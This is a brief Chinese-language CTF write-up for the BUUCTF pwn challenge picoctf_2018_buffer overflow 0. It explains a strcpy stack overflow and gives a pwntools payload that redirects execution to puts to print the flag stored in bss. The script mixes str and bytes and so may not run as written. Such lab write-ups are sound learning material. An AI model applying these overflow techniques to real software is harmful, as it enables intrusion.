[BUUCTF-pwn]——picoctf_2018_buffer overflow 0

好久不寫BUU了，手都快生了趕快過來寫寫。
通過觀察源文件發現，首先有put函數不需要去libc中找，同時argv肯定大于1，也就是需要至少兩個參數，才可以到else語句，同時vuln函數的參數是第二個參數。

進入vuln函數內部看看，找到strcpy函數這個函數是一個典型的可以用來利用溢出的函數。所以我們可以在這里進行棧溢出，以此調用puts函數打印flag.因為flag在bss段上。

from pwn import * elf = ELF("./PicoCTF_2018_buffer_overflow_0") payload = 'a' * (0x18 + 4) + p32(elf.plt['puts']) + 'junk' + p32(0x0804A080) print("payload : " + payload)

總結

以上是生活随笔為你收集整理的[BUUCTF-pwn]——picoctf_2018_buffer overflow 0的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。